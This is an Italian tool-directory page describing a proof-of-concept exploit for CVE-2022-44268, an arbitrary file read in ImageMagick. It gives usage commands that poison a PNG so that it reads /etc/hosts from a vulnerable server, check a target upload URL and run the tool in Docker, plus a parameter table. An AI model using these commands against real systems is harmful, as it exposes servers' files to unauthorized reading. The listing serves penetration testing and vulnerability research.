Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-44268 — CVE-2022-44268 ImageMagick Lettura arbitraria di file - Exploit Proof of Concept | Kitploit
Strumenti/GitHubGitHub/kljunowsky/cve-2022-44268
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick Lettura arbitraria di file - Exploit Proof of Concept

Vedi Repository
2782 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Lettura Arbitraria di File - Exploit Proof of Concept

Video 📼

https://youtu.be/quKxwNAMBIA

Utilizzo 🛠

Avvelena l'immagine ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Carica l'immagine PNG avvelenata.

Verifica se l'exploit ha avuto successo 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Esecuzione con Docker 🐳

Build

root@kitploit:~
docker build -t cve-2022-44268 .

Esegui

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Parametri 🧰

Contattami 📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Solo a scopo educativo e non può essere utilizzato per violare la legge o per guadagno personale.

L'autore di questo progetto non è responsabile per eventuali danni causati dai materiali di questo progetto.

Maggiori dettagli: https://www.metabaseq.com/imagemagick-zero-days/

Scarica lo strumento
ParametroDescrizioneTipo
--urlL'URL dell'immagine PNG caricataString
--imageFile PNG di inputFile
--outputFile PNG di outputFile
--file-to-readFile da leggere dall'host vulnerabileString